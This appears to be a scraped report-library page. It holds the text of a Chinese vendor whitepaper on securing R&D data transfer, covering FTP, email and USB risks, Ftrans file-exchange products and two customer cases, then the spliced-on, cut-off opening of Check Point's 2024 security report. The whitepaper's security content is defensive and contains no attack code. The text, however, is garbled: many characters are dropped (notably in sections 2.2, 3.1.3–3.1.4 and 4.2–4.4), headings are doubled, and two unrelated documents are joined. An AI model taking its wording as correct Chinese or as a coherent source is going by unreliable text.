    F F 目录目录(C CONTENTSONTENTS)1、研发数据是企业的重要数据资产.2 1.1、企业研发投入呈增加趋势,重点行业增速显著.2 1.2、研发数据是企业重要的数据资产.2 2、不同场景下,研发数据传输安全风险分析.4 2.1、企业存在多种场景下的研发数据传输需求.4 2.2、研发数据传输面临不同维度的风险.5 2.3、研发数据传输层面存在共性的需求.7 3、研发数据安全传输解决方案.8 3.1、产品解决方案.8 3.2、方案特性与优势.9 4、研发数据安全传输管控应用场景.12 4.1、研发数据跨隔离网安全传输.12 4.2、研发数据跨区域安全传输.13 4.3、研发数据异地同步传输.14 4.4、研发机台数据安全采集.15 5、研发数据安全传输应用案例.17 5.1、某全球领先的科技公司.17 5.2、某全球领先芯片供应商.19 F 1 版权说明版权说明 本研发数据安全传输管控实践精华的知识产权以及衍生的任何相关权利均归飞驰云联(南京)科技有限公司(下称“飞驰云联”)所有。本白皮书仅供个人和公司通过飞驰云联官方渠道下载取得。未经飞驰云联的许可,任何个人或公司不得以商业化的目的引用白皮书中的内容,或将其取得的白皮书以其他区别于飞驰云联授权渠道的方式进行宣传传播,或向公众和其他第三方提供白皮书的下载服务。就任何侵犯飞驰云联权利的行为,飞驰云联将追究其法律责任。本白皮书的内容仅供参考,飞驰云联不对任何因参考本白皮书内容而作出的商业决策的结果负责。F 2 1 1、研发数据是企业的重要数据资产、研发数据是企业的重要数据资产 1.11.1、企业研发投入呈增加趋势,重点行业增速显著、企业研发投入呈增加趋势,重点行业增速显著 企业要长远发展就要建立自己的核心竞争力,随着网络的发展,各行业在经历技术革新,企业面对的竞争更加复杂激烈,因此,建立自己的关键优势成为重中之重。近年来,不同领域的企业均增加了企业的研发投入,研发投入对企业具有重要意义,有助于提升企业的技术创新能力、产品竞争力、产业升级和结构调整能力,培养高素质人才,以及实现可持续发展。我国不仅在国家层面,还是社会层面,整体的研发投入均呈现增长的趋势,如计算机、通信和其他电子设备制造业是一个典型的高研发投入行业。其次,互联网、医药制造业、装备制造业、消费品制造业等领域的企业也在研发方面有着不俗的投入。以科创板为例,近七成公司披露的2023 年年报显示,科创板整体研发投入持续增加。在医药行业,研发实力是医药企业尤其是创新药企行业“长跑”中能否胜出的重要因素。根据同花顺数据,259 家 A 股上市药企披露的2023 年经营业绩显示,合计研发投入达到了 811 亿元,同比增长 7.43%,尽管增速较上年有所放缓,但整体仍呈现持续攀升态势。资料来源:中国科技统计年鉴 前瞻产业研究院 1.21.2、研发数据是企业重要的数据资产、研发数据是企业重要的数据资产 企业的核心资产主要体现在其科技创新和信息技术领域的核心竞争力和技术优势。技术资产是科技型企业的重要组成部分,它是衡量一个技术型企业创新能力的关键指标。按照会计准则,技术的资产表达通常归类为无形资产,如专利、著作权和商标等注册知识产权。然而,在技术飞速发展和科技创新具有巨大商业价值的背景下,围绕智力资本和创新资源的大量投资与并购,F 3 本质上都是针对技术资产的投资和并购。这些技术资产的价值在科创企业的估值中往往远高于其账面价值,是企业的核心资产。因此,企业研发数据对企业而言具有至关重要的意义。特别是以研发为核心业务及定位的企业,如半导体 IC 设计、生物制药、科研单位等,研发数据就是其最核心的数据资产,研发成果就是其生命力的根本。研发数据因所属行业不同,定义和内涵各有差异,一般而言,研发数据包括如下:设计和仿真数据:涉及产品设计、模型、工艺和制造流程仿真和验证等。这些数据主要用于优化生产流程,提高生产效率和质量。研发投入、进展和成果数据:反映了研发活动的经济投入、项目进展情况以及最终的研发产出。管理层通过分析这些数据来确定研发方向、优化研发流程以及评估研发绩效。生产过程数据:涵盖生产线各个环节的信息,如零件加工、组装、物流运输等。通过对这些数据进行实时监测和分析,可以提高生产效率,降低生产成本,并在生产过程中及时发现和解决问题。维护和保养数据:包括设备的使用寿命、维护和保养记录等。这些数据对于降低设备故障率,提高设备的可靠性和寿命至关重要。质量数据:涵盖了产品的各个质量参数,如尺寸、形状、表面质量等。通过对质量数据的分析,可以发现生产过程中的问题,改进生产过程并加强产品质量控制。研究数据:指以数字形式出现的文档,即科学研究活动过程中收集或生成的,用作研究过程中的证据,或者在研究界被公认为验证研究成果的数据。由于研发数据类型多样,种类不一,但体量大、价值高、重要性突出,因此,研发数据保护对企业而言就有充分的必要性。企业内部面临多种安全和监管风险,只有在确保数据安全的情况下,数据的价值才能被充分发掘和利用,企业的竞争力才能延续和扩展。F 4 2 2、不同场景下,研发数据传输安全风险分析、不同场景下,研发数据传输安全风险分析 不同的行业数据的生产、存储、使用、传输、销毁过程各有差异,但整体而言,数据在企业内部并非静止的状态,相反,数据要发挥价值,就必然伴随数据的流转和利用。数据流转场景与企业所处的行业领域及管理模式相关,从企业的安全管控角度、结合业务场景而言,企业内部存在着多种研发数据的传输需求。2.12.1、企业存在多种场景下的研发数据传输需求、企业存在多种场景下的研发数据传输需求 2.1.12.1.1、研发数据跨隔离网数据传输、研发数据跨隔离网数据传输 企业为保护网络安全和数据安全,使用网络隔离手段进行网络隔离,如银行内部将网络隔离为生产网、办公网、DMZ 区;如生物制药企业、医院等机构将网络隔离为内外网;此时,研发数据基于保护需求存储在隔离网内,当需要对研发数据进一步应用时,就涉及到隔离网间的数据传输。银行提数需求:将重要数据从生产网中提取到办公网环境;半导体企业:IC 设计企业将电路设计进行下一步的仿真验证,进而生成最终的 GDSII 文件,此时需要将电路文件进行跨隔离网传输;生物制药企业:实验室的研发数据需要从外部向内部导入,或向外部导出进而进行下一步的分析验证等。不同行业和企业对研发数据的使用场景不同,但在隔离网的情况下,要进一步应用数据,就不可避免涉及到跨隔离网的数据交换需求。2.1.22.1.2、研发数据跨区域数据传输、研发数据跨区域数据传输 当企业规模较大时,基于业务发展需求和政策环境因素,在异地设计研发中心、实验室、科研所等机构,此时,当异地的研发数据需要传回总部时,就产生了跨区域数据传输场景。跨区域数据传输对于大型企业而言,是非常常见的传输需求,此时跨区域可能是网络区域,也可能是地理区域,如同城异地、不同城市、甚至不同国家间的数据传输都是较为普遍的。F 5 研发数据跨区域传输的主体一般为人,经由终端传输并进入下一步的数据分析应用。2.1.32.1.3、研发数据异地同步传输、研发数据异地同步传输 研发数据异地同步传输需求区别于跨区域数据传输需求,异地同步通常是常规性的、规律性的、周期性的数据收集需求,与跨区域数据传输相比,它的偶然性更弱,传输的因素更明确,同时,通常很少涉及人员,多发生在服务器和业务系统间。大型科研单位在异地的科研部门、实验中心、数据中心等需按时向上汇报数据,此时,数据同步的范围、类型、频次等基本都是确定而固定的,它的管理诉求和跨区域也有所不同。2.1.42.1.4、实验机台数据的采集、实验机台数据的采集 对于半导体、生物制药、工业设备、电子工程等领域,研发数据很多是由机台产生的,这些机台运行环境、生产厂商、数据类型都各不相同,但企业需要及时地对数据进行采集,以便进行分析,及时发现生产问题、排除设备障碍、优化生产流程,进而提升良率和生产效率,因此,实验机台数据的采集也是重要的研发数据传输场景。2.22.2、研发数据传输面临不同维度的风险、研发数据传输面临不同维度的风险 企业 般通过互联、VPN、搭建专线的 式来进行数据的传输,在传输 具上,则倾向于使移动介质、邮件、FTP 应,及 建数据传输系统等方式。这些方式可应对企业内复杂的研发数据传输需求,但同样由于传输机制的漏洞、管理的缺陷、功能的不足也会带来一些风险,这些风险包括数据的安全风险,合规风险及管理风险等。2.2.12.2.1、数据被窃取、攻击等安全风险、数据被窃取、攻击等安全风险 1.FTP 明文传输:FTP 协议在传输用户凭据(如用户名和密码)时不会进行加密处理,这意味着用户名和密码是以明文的方式传输的。这样的传输方式容易被黑客拦截并窃取,从而可能导致未授权访问和数据泄露。2.FTP 传输不加密:FTP 传输的数据本身也是不加密的,这意味着在传输过程中,任何人都有可能窥视到数据内容。此外,传输过程中还可能存在中间人攻击的风险,攻击者可能篡改或窃取数据。F 6 3.邮件恶意软件:恶意软件如病毒、蠕虫、特洛伊木马等可能通过电子邮件附件或链接进行传播。一旦用户点击了恶意链接或下载了受感染的附件,这些恶意软件就可能感染用户的电脑系统,窃取个人信息或进行破坏活动。4.U 盘病毒感染:U 盘在不同计算机之间频繁使用,容易成为病毒、木马等恶意软件的传播媒介。一旦 U 盘被感染,这些恶意软件就可能随着 U 盘的插入而传播到其他计算机上,导致系统被攻击、数据被破坏等问题。2.2.22.2.2、数据隐私可导致合规风险、数据隐私可导致合规风险 1.数据隐私性:如互联网企业研发数据中可能涉及用户敏感信息,因此,数据流转需要更加关注数据的安全性与隐私性管理,采用分层授权、身份验证、审批制度、细粒度控制等措施,落实数据“最小必要”原则,规避因数据管理不当而产生的合规风险和监管处罚。2.数据跨国传输:产生法律差异与合规成本,不同国家和地区的数据安全法律法规各异,跨国企业在数据传输时需要遵守各方的要求,否则可能面临法律诉讼和罚款。这增加了研发数据传输的合规成本和法律风险。3.数据安全审计:基于行业监管要求,需要 监管数据的使用行为应通过管理和技术手段确保可追溯,完善数据安全技术,定期审计数据安全,这就要求研发数据传输需要具备完整的、连续的、真实的、全面的日志记录。2.2.32.2.3、数据丢失、遗漏损害数据价值、数据丢失、遗漏损害数据价值 1.邮件传输泄密:由于电子邮件传输过程中缺乏加密保护,邮件内容可能被第三方非法获取,导致敏感信息泄露。这不仅会侵犯用户的隐私权,还可能给企业和个人带来严重的经济损失。2.邮件客户端攻击:某些电子邮件客户端可能存在设计缺陷,这些缺陷可能被攻击者利用来传播病毒或木马程序。一旦用户的电脑被感染,攻击者就可以控制用户的设备,窃取信息或进行其他恶意活动。3.U 盘丢泄密:U 盘作为一种便携式存储设备,容易丢失或被盗。如果 U 盘中含有敏感信息,如个人身份信息、公司机密等,一旦丢失或被盗,就可能导致数据泄露,给个人或企业带来严重损失。F 7 4.U 盘权限泄密:如果 U 盘没有设置访问权限或加密措施,任何人都可以轻易地访问其中的数据。这可能导致敏感信息被未授权人员获取,甚至可能被用于非法活动。5.FTP 权限泄密:FTP 服务器通常提供多个权限级别,但不同级别的用户之间的文件权限可能存在重叠或冲突,这可能导致数据泄露或误操作。6.FTP 匿名身份:一些 FTP 服务器支持匿名登录,这增加了安全风险。黑客可能利用匿名身份进行恶意活动,如上传恶意文件或窃取数据。2.2.42.2.4、数据传输稳定性影响业务效率、数据传输稳定性影响业务效率 1.U 盘损坏:U 盘在使用过程中可能会因为物理损坏、磁场干扰等原因导致数据损坏或丢失。此外,频繁的拔插和不当的操作也可能对 U 盘造成损伤,进而影响数据传输的稳定性。2.网络拥塞:FTP 传输文件的速度受到网络带宽的限制。当多个用户同时使用同一网络时,网络带宽会被分摊,导致传输速度变慢。此外,网络流量过大时,可能导致网络拥塞,进一步影响 FTP 传输的稳定性。3.数据丢包:FTP 传输需要通过网络进行,任何网络问题都可能导致文件传输缓慢或失败。网络延迟和丢包是两个常见的问题,特别是在处理大文件或跨越长距离的网络连接时。4.传输中断:当传输的文件体量较大(GB 级或 TB 级)、或传输的文件数量较多(百万级),对于传输的网络环境、带宽就有了更高的要求,但无论 FTP、邮箱、还有 IM 通信工具、FTP 脚本等方式,均易突然出现传输中断的异常情况,导致数据无法继续正常传输。5.文件损坏:传输的文件体量较大、文件类型较为特殊时,由于传输稳定性弱、网络环境差、无文件校验机制等问题,易出现文件损坏的情况,此时,就会对业务的下一步操作产生影响。2.32.3、研发数据传输层面存在共性的需求、研发数据传输层面存在共性的需求 1.安全:系统安全性,具有整体安全机制保障,即使平台被恶意人员攻破,也无法获取到交换过程中的敏感数据。有多重安全保护策略,保护数据的安全性,避免数据泄露的安全风险。2.合规:符合国家行业法规中关于数据交换的要求,使企业避免合规风险。3.可控:文件交换整体是可控的,具体体现在交换的主客体可控、过程可控及内容可控。F 8 4.可靠:文件传输是可靠的、内容是准确一致的、速度是高效的。5.高效:文件交换整个过程是高效的,便捷提升业务;同时有效提升 IT 人员的管理效率。6.可追溯:文件交换日志记录机密且完整、并可追溯原文件和操作记录。7.集成扩展:可以与企业现有的数据交换相关、数据安全相关的系统进行良好的集成。3 3、研发数据安全传输解决方案、研发数据安全传输解决方案 针对企业研发数据安全传输的需求,飞驰云联提供企业研发数据安全传输管控解决方案,帮助企业建设安全合规、高效便捷的数据传输通道,在保障数据安全的同时,提升文件交换的效率。3.13.1、产品解决方案、产品解决方案 3.1.13.1.1、研发数据跨隔离网安全传输解决方案、研发数据跨隔离网安全传输解决方案 Ftrans 跨网文件安全交换系统是一款针对性解决企业隔离网间数据交换的纯软产品,拥有跨网数据交换、病毒查杀、文件内容检测、审核审批、权限管控、日志审计等文件交换全周期功能,集合企业文件管控、编辑、传输、安全管理为一体,实现安全、高效、可靠、便捷的跨网文件交换,具有创新性意义。Ftrans 跨网文件安全交换系统提供全套的研发数据跨隔离网安全传输解决方案,解决企业常见的研发数据在内部隔离网间交换场景问题。3.1.23.1.2、研发数据跨区域传输解决方案、研发数据跨区域传输解决方案 Ftrans MDE 多区域文件交换系统,帮助企业构建统一、安全、高效的跨域文件交换通道,实现可控、可靠、便捷的企业总分支数据流转,在保障数据安全性的同时,有效提升业务效率,帮助企业降本增效。在统一的系统界面上可以实现对企业多个总分支机构跨域文件交换的管控,包括使用人员、数据权限、存储额度、文件交换方向、内容及授权策略等;提供文件交换授权机制、强大的审批F 9 功能、病毒查杀功能、敏感信息检查等多重跨域文件安全策略,保证文件跨域交换时是安全、合规的,规避重要数据违规流转。3.1.33.1.3、研发数据异地同步传输解决方案、研发数据异地同步传输解决方案 Ftrans Sync 件同步备份系统,通过 速引擎技术、速传输协议技术、数据全局同步备份管理平台等 有研发的核 技术,为企业提供专业的企业级数据同步解决 案。系统具备强 的 件同步功能,持多种 件同步策略配置,持跨平台部署,灵活响应企业不同业务场景下的 件同步需求。3.1.43.1.4、研发机台数据采集解决方案、研发机台数据采集解决方案 Ftrans MDT 机台数据传输管控系统帮助企业建 统 的机台数据汇集和管控通道,灵活、可靠、有效 撑机台数据采集和管理需求,实现机台数据的有效利,提升 产质量和效率。能可靠 持多部机台数据同时采集,并保证所有机台数据采集的完整性和准确性,杜绝遗漏、跳过等数据缺失 为;系统具有 性能传输技术,对多台数据产 的 体量数据也能可靠、稳定汇集和传输。对于企业不同 区、规格、商、运作模式的机台,均可通过系统进 统 的数据采集,帮助企业构建内部统 的机台数据汇集通道,便于机台数据的集中处理和使。3.23.2、方案特性与优势、方案特性与优势 3.2.13.2.1、数据安全保障、数据安全保障 1 1)研发数据传输过程的三重安全保护)研发数据传输过程的三重安全保护 飞驰云联文件安全交换系统内置的加密机制和通信策略,从根本上上保障系统安全性:文件交换过程仅开通服务器通信策略,终端之间禁止通信和数据交换,有效保障网络架构的安全性。传输基于 UDP 的私有协议接口和报文,杜绝对服务的非法嗅探,恶意截获报文也无法进行解析。F 10 采用金融级 AES128/256 位加密算法,支持国密算法适配,智能生成和管理密钥,一传一密。2 2)文件传输加密)文件传输加密 飞驰云联文件安全交换系统采用创新的文件包概念,将用户待处理交换的一个批次的业务文件和文件夹封装进一个文件包,并且生成一个包含包裹内容信息和投递信息的元数据。传输的文件包是一个固化封装的元数据,通过文件交换系统组织单元内的用户可以根据权限进行访问。任何人,包括数据的发起者都不能再对该文件包进行重新拆分或修改处理。支持文件传输内容加密,可以选择数据加密方案,在数据收发两端之间形成加密隧道,以保证在传输过程中,业务数据不会被窃取或泄露。系统提供数据存储加密配置,确保数据安全性,支持定期更换密钥。3.2.23.2.2、文件交换行为可控文件交换行为可控 文件交换行为要保证可控性,那么,需要保证文件交换的三因素:主客体、过程、内容均是可控的。1 1)主客体可控)主客体可控 企业可以通过飞驰云联文件安全交换系统,对机构的员工权限做精细管控。基于用户账号管理、身份认证及权限管控,保证文件交换过程主体和客体(员工与数据文件)之间是合规且经过了授权。飞驰云联文件安全交换系统内置用户账号体系,管理员可根据企业需要进行用户账号的建立,可手动创建、批量导入用户信息;同时支持第三方 AD/LDAP 等进行组织结构、用户账号和用户组的自动同步。通过系统,可以对用户权限进行管控,体现在用户的功能权限和数据权限上。功能权限包括是否开启用户对联系人、个人文件夹、共享文件夹、通知、文件邮、中转站等功能的使用权限;数据权限则包括管理/编辑/下载/发送/上传/浏览/禁止访问等细分的数据使用权限。F 11 2 2)文件交换内容可控)文件交换内容可控 用飞驰云联文件安全交换系统进行数据流转,需经过多重安全策略检查,并经过严密的审批,通过后文件方可发出,确保外发的文件既是安全的,也是合规的。数据流转风险识别包括病毒查杀、敏感信息检测、文件类型识别、文件特征识别等。对于待流转的文件,从文件的发起方、接收方,到文件的大小、文件名、文件个数、文件来源、是否含有敏感内容、文件类型、是否含有病毒等,均可以进行安全检查。文件类型覆盖 1 万 3 千余种常见文件,并可识别真实文件,不受嵌套压缩包、修改文件后缀名等绕过行为影响;文件敏感信息检测可以自定义内容或正则表达式的形式探测,识别混入的敏感内容。可配置多种文件安全检测条件组合成文件安全检查策略。当文件经过安全检测后,可触发三种不同的处理机制:检测通过-文件放行发送;检测不通过-文件发送阻断;检测不通过-文件转人工审核;进而规避重要数据违规流转,进而发生数据泄露事故。3 3)文件交换流程可控)文件交换流程可控 文件交换授权机制文件交换授权机制 飞驰云联文件安全交换系统采用文件交换授权机制,即对人员、交换关系、交换方向进行授权后,用户才可发起文件交换行为,当组织和人员、及其相互间的文件交换路径未被授权时,文件就无法进入流转环节。企业可以批量对文件投递进行授权,并根据管理需求随时灵活调整。文件交换审批机制文件交换审批机制 飞驰云联文件安全交换系统提供内置的灵活强大的审批功能,可设置未经审批的文件无法进入发送过程,进而对交换流程进行管控。管理员按照业务的需要建立传输审核审批流程,支持按组织架构、汇报关系两种逻辑进行逐级 审批,同时支持会签、或签、转审、抄送等审批流程。系统支持审核审批触发条件配置管理,管理员可配置审核流程,当文件名称、扩展名、单体文件大小、总文件大小、操作人及目标人范围等触发了审核条件时,系统将转向指定的人工审批流程,并提供文件安全检测结果作为审批的参考。F 12 3.2.33.2.3、高性能高可靠传输、高性能高可靠传输 飞驰云联文件安全交换系统具有私有 CUTP 文件传输协议,可以有效提升带宽利用率到 80%,有效保障文件传输的速度。针对大文件和海量文件传输,系统使用大文件虚拟分块、小文件虚拟拼接技术,保障大文件、海量文件可靠、高效、稳定传输。系统内置文件校验机制,有效保障接收文件与发送文件 100%的匹配和准确,在用户获得极致传输体验的同时,也能安心传输的安全性和准确性。3.2.43.2.4、便于审计和追溯、便于审计和追溯 飞驰云联文件安全交换系统完整记录平台所有用户操作日志和文件交换日志,包括对触发审核的相关发送行为进行完整的日志记录、对全局下的使用行为和传输行为进行完整记录。采用创新的“文件包”概念,用户待交换的一个批次的文件、投递信息封装进一个文件包进行传输,任何人无法进行拆分篡改。系统记录文件包交换的全过程日志,可追溯原始文件。可长期保留原始传输文件,不受用户删除影响。日志支持定期自动归档和清理,默认存储 36个月,可自定义修改,缓解企业存储压力。4 4、研发数据安全传输管控应用场景、研发数据安全传输管控应用场景 4.14.1、研发数据跨隔离网安全传输、研发数据跨隔离网安全传输 研发数据在企业内部跨网文件交换是相对较为普遍而频繁的文件流转需求。基于国家法律法规要求及自身安全管理需要,许多企业进行内部网络隔离。不同企业隔离方案各不相同,如银行一般隔离为生产网和办公网、证券公司一般隔离为操作内网和操作外网等,生物制药企业一般隔离为生产网、办公网等。F 13 审批集成审批集成 系统内置审批机制,并可与企业 OA 系统等进行审批流集成,使审批与传输数据一一对应,并满足审批-传输一体化,避免因各环节割裂而导致的安全漏洞;自动敏感信息检查自动敏感信息检查 系统内置内容安全检查机制,自动进行防病毒检查、文件类型识别、敏感信息检查等,避免重要的研发数据违规流转或外泄。4.24.2、研发数据跨区域安全传输、研发数据跨区域安全传输 型企业和集团为扩 市场份额、优化资源配置,在不同地区设 多级下属分 机构、研发中心、实验室等,存在研发数据横向或纵向流转的需求,研发数据进行跨区域安全传输的场景。F 14 实时监控实时监控 件传输状态件传输状态 对于总部和分 机构间,件的逐级下发和上传,可实时可视化跟踪 件流转进度;对于各分 机构是否正常使、及使 状态等信息也可便捷监控,及时发现问题。分分 机构机构 件交换精细管控件交换精细管控 针对不同的 件类型、分 机构、员 、及 件交换 向,可灵活配置不同的管控策略,进 控制研发数据流转的内容和范围,实现精细管控。4.34.3、研发数据异地同步传输、研发数据异地同步传输 企业的数据中心、服务器节点、异地分支机构、外部合作伙伴之间等,存在多种文件交换场景,企业需要自动化、高可靠、可管控、可集成的文件传输。F 15 传输任务管理传输任务管理 按需创建不同节点之间的文件传输任务,支持实时同步任务、周期性同步任务、一次性手动传输任务;发现已传文件发生变化,自动增量传输;能够按文件特征进行筛选,仅传输符合条件要求的文件。传输过程可视化监控传输过程可视化监控 能够实时监测任务执行状态,并进行任务调度控制,随时启动、暂停或终止文件同步任务;完整掌握分布式传输系统内所有节点执行传输任务的实时情况;支持任务通知,当任务完成或出现异常时,向管理员发出邮件通知。4.44.4、研发机台数据安全采集、研发机台数据安全采集 端制造业、半导体晶圆制造、型券商等企业,在 产经营中,机台会产 庞 属性不同的数据,企业需要对数据进 即时或定期的采集,以有效利 数据、及时排查 产问题、提 产品良率和经营质量,实现良性循环。F 16 可靠可靠 持多机台、持多机台、体量数据体量数据 能可靠 持多部机台数据同时采集,并保证所有机台数据采集的完整性和准确性,杜绝遗漏、跳过等数据缺失 为;系统具有 性能传输技术,对多台数据产 的 体量数据也能可靠、稳定汇集和传输。数据采集过程可数据采集过程可 可管控可管控 基于系统可对各数据采集通道进 管理,并根据采集时间、频率、过滤条件、存储位置等维度设置不同的采集策略;可查看数据采集状态,当通道出现异常时,系统告警机制将及时通知管理员;同时,系统提供完整的 志记录,便于企业审计和追溯。F 17 5 5、研发数据安全传输应用案例、研发数据安全传输应用案例 5.15.1、某全球领先的科技公司、某全球领先的科技公司 W 科技公司是全球 500 强科技企业,聚焦全联接网络、智能计算、创新终端等领域,在产品、技术、基础研究、工程能力等方面持续投入,并且注重保护自己的知识产权。W 科技公司始终致力于为客户创造价值、保障网络安全稳定运行、推动产业良性发展。5.1.15.1.1、数据交换场景、数据交换场景 为了有效保障自身的信息安全、保护知识产权和核心数字资产,W 科技公司分布在全球的多个分支机构、研发中心,均已通过防火墙、网闸、虚拟化等方式,实施了企业内网和外网的隔离,以及核心研发网、实验网和办公网的隔离。网络隔离之后,由于业务需要,仍然需要在各网络之间进行必要的数据交换。5 5.1.2.1.2、数据安全管控挑战、数据安全管控挑战 过去在这些跨网文件交换和业务协作的场景中,W 科技公司主要采用共享存储、磁盘映射等形式开放数据访问权限,然后通过移动介质、网络拷贝等人工操作方式完成文件的转移和交换,同时还需要使用内部审批系统,辅助进行文件授权、转移、收发的审核审批。其中主要存在以下问题:基于磁盘映射、共享存储等方式,需要开放各种服务端和存储层的访问权限。如果长期开放权限,存在较大的安全风险;如果短期开放权限,则需要频繁地进行授权分配和回收,维护工作量较大,甚至存在出错、疏漏的可能性,尤其在用户众多的情况下,问题则更加突出。通过磁盘映射、共享存储的方式获取文件数据,缺乏完备的日志记录,无法对文件的获取、交换行为实施有效的审计和监督制约,一旦发生信息泄露难以追溯。审批过程和文件操作是割裂的,审批时难以对文件内容进行有效确认,易发生错审、漏审的情况;同时用户需要在审批系统、文件管理工具之间切换,操作效率低下,影响业务连续性。F 18 5.1.35.1.3、解决方案、解决方案 在 W 科技公司各研发中心或分支机构的网络架构中,已经逻辑划分了研发网、办公内网、办公外网等隔离区域,其中,研发网和其它各区域之间均禁止直接的网络访问,无法进行任何数据交换和通信。通过部署飞驰云联跨网文件安全交换系统,等同于在各网络边界位置建立了一个跨网安全交换区,所有跨网交换的数据均通过该区域进行转换。通过网络隔离策略的配置,研发网和办公内网内的桌面终端,可以访问本系统,并在审核和审计的基础上进行文件交换。办公外网和互联网终端,在一定的 IP 访问控制策略之下,可以有限地访问本系统。所有的文件交换行为均有完整的日志记录,以便审计追溯。5.1.45.1.4、实践效果、实践效果 目前,应用已经在 W 科技公司海外七个国家的研发中心上线投入使用,服务该企业分布在全球的 10000 多名终端用户。通过飞驰云联跨网文件安全交换系统的应用,W 科技公司快速建立了一个安全可控、高效便捷的内外网文件交换渠道和内外部文件交换渠道,做到了文件跨网交换可审批、可审计,有效控制了文件交换行为,减低了数据泄露的风险,提高了企业对知识产权的综合保护能力。F 19 5.25.2、某全球领先芯片供应商、某全球领先芯片供应商 某全球领先的芯片供应商,成立于 2005 年,总部设于北京,在国内上海、深圳、合肥等地及国外多个国家和地区均设有分支机构和办事处,致力于为客户提供更优质、便捷的服务。5.2.15.2.1、数据交换场景、数据交换场景 该公司基于网络安全管理的需求,将内部网络划分为研发网、测试网及非研发网(办公网)三个互相逻辑隔离的网络区域,各网络区域采用防火墙进行隔离。在当前网络隔离架构下,为正常推进日常业务开展,该公司用户需要在研发网-测试网间、测试网-办公网间及研发网-办公网间进行设计数据的跨网传输;此外,该公司北京、上海、合肥、西安、苏州 5 个总部及分支的研发网之间也需要进行数据的互相交换;在该公司的业务规划中,未来,该公司还将覆盖跨国文件传输的场景。5.2.25.2.2、数据安全管控挑战、数据安全管控挑战 过去,该公司数据交换主要通过内部邮件、IM 即时工具、移动硬盘以及 FTP 软件等方式进行;涉及到重要数据跨网交换时,由需要发送文件的业务部门提出申请,通过审批后,IT 部门开通 FTP 账号权限来完成文件的传输。在使用的过程中,该公司发现这种方式存在以下问题:1、安全性较低。邮件、IM 工具、FTP 软件在产品形态上没有严密的安全设计,在使用上也没有审核、内容检查、病毒查杀等传输过程中的安全管控机制,因此易引发数据安全事故。2、随着企业的不断发展,内部业务数据的体量和交换频率都在增加,移动硬盘、FTP 软件等方式无法快速、高效地响应文件交换需求。3、5 个总部及分支间、公司隔离网间都需要跨网文件交换,IT 部门需进行大量的 FTP 账号管理和系统维护工作,运维投入较大。4、涉及传输审核时,审核与传输于 2 个系统进行、环节割裂,操作不便且有安全风险;此外,整个传输过程没有完整的日志记录,不利于审计工作的开展。F 20 5.2.35.2.3、解决方案、解决方案 该公司经过市场调研和需求考察后,最终选择引入 Ftrans 飞驰云联跨网文件安全交换系统,来完成更专业、优化的跨网文件传输平台建设。Ftrans 跨网文件安全交换系统上线后,快速在该公司内部得到了推广,目前系统运行稳定、反馈良好,完善的功能和友好的用户设计受到了该公司研发人员的高度认可。Ftrans 跨网文件安全交换系统替代了该公司原有的 FTP、U 盘硬盘等方式,规避了潜在的数据泄露风险,实现了事前可控制、事中可审查、事后可追溯的跨网文件交换全生命周期管控,在确保安全合规的前提下,既切实提高了业务效率,降低了运维投入成本,又有效地保护了核心资产,夯实了企业在数字时代的竞争力。F 21

    浏览量53人已浏览 发布时间2024-05-09 23页 推荐指数推荐指数推荐指数推荐指数推荐指数5星级
  • Check Point:2024网络安全报告(103页).pdf

    网络安全网络安全报告报告20242CHECK POINT SOFTWARE|2024 2024 年安全报告年安全报告YOU DESERVE THE BEST SECURITY3CHECK POINT SOFTWARE|2024 2024 年安全报告年安全报告第第 1 1 章章 2024 年网络安全报告引言2024 年网络安全报告引言 研究副总裁 MAYA HOROWITZ第第 2 2 章章 2023 年重大网络事件时间表2023 年重大网络事件时间表第第 3 3 章章 网络安全趋势网络安全趋势26 勒索软件零日攻击和大型攻击30 攻击面不断扩大:边缘设备的新风险34 政府背景的黑客行动主义和 Wiper 成为新常态38 令牌遭受攻击:云计算的致命弱点41 PIP 安装恶意软件:软件存储库遭受攻击第第 4 4 章章 全球分析全球分析 第第 5 5 章章 引人注目的全球性漏洞引人注目的全球性漏洞第第 6 6 章章 CHECK POINT 事件响应相关见解CHECK POINT 事件响应相关见解第第 7 7 章章 为首席信息安全官提供独到洞察 预测为首席信息安全官提供独到洞察 预测 第第 8 8 章章 人工智能:当今网络安全战中的前沿防御者人工智能:当今网络安全战中的前沿防御者第第 9 9 章章 恶意软件系列说明恶意软件系列说明第第 10 10 章章 结语结语040725467075818593101目录目录4CHECK POINT SOFTWARE|2024 2024 年安全报告年安全报告102024 年 网络安全报告引言第第 1 1 章章MAYA HOROWITZ Check Point 研究副总裁5CHECK POINT SOFTWARE|2024 2024 年安全报告年安全报告欢迎查看Check Point 2024 年安全报告。2023 年,网络安全世界发生重大变化,网络攻击的性质和规模都在迅速演变。这一年,我们看到网络威胁从隐形匿迹于虚拟世界,到明目张胆登上现实舞台,吸引了从政府机构到普罗大众的无数关注目光。这些攻击使用的方法花样百出,背后的原因同样五花八门。勒索软件仍然是主要威胁之一,攻击者不只索要钱财,还想寻求“赏识”。勒索软件利用零日漏洞发起攻击,同时利用羞辱性网站来披露受害者身份,攻击者对这种攻击方式越发趋之若鹜,勒索软件也因此成为网络犯罪分子之间攀比的筹码。遭受这些攻击的代价不仅仅是支付赎金,有些公司和组织,比如米高梅(MGM)、迪拜环球港务集团(DP World)和大英图书馆(British Library)等还要面对重建系统的巨额开支。此外我们看到,黑客行动主义(即因政治或社会原因而产生的黑客行为)有所增加。这类黑客行为曾是个体行动者的工具,现在则由政府用作间接攻击对手的方式。在俄乌冲突和巴以冲突等事件发生后,这一点尤为明显。攻击者找到了侵入系统的新方法,路由器和交换机等设备便成为容易攻击的目标。包括 Okta 和 23AndMe 在内的一些大型组织都遭到过利用窃取的登录信息或恶意软件发动的攻击。人工智能(AI)在本年度网络攻击中扮演了更重要的角色。攻击者开始使用人工智能工具来更有效地实施钓鱼活动。不过好消息是,网络防御者同样也在使用人工智能来更好地防范这些威胁。第 1 章6CHECK POINT SOFTWARE|2024 2024 年安全报告年安全报告网络犯罪分子阻击战亦有捷报传来。包括美国联邦调查局(FBI)在内的多个执法机构在消除 Hive 勒索软件网络和 Qbot 基础设施等主要威胁方面,取得了进展。但其中一些组织卷土重来,也在提醒着我们,与网络犯罪的斗争任重而道远。本报告将回顾 2023 年发生的重大网络安全事件,提供独到洞察和分析,帮助大家了解并提前筹备,应对未来挑战。我们的目标是为组织、政策制定者和网络安全专业人员提供有价值的信息,协助他们在日益数字化的世界中构筑更强大的防御体系。希望本报告能为您提供丰富、翔实的信息,对您保障数字环境安全有所助益。Maya HorowitzCheck Point Software Technologies 研究副总裁第 1 章7CHECK POINT SOFTWARE|2024 2024 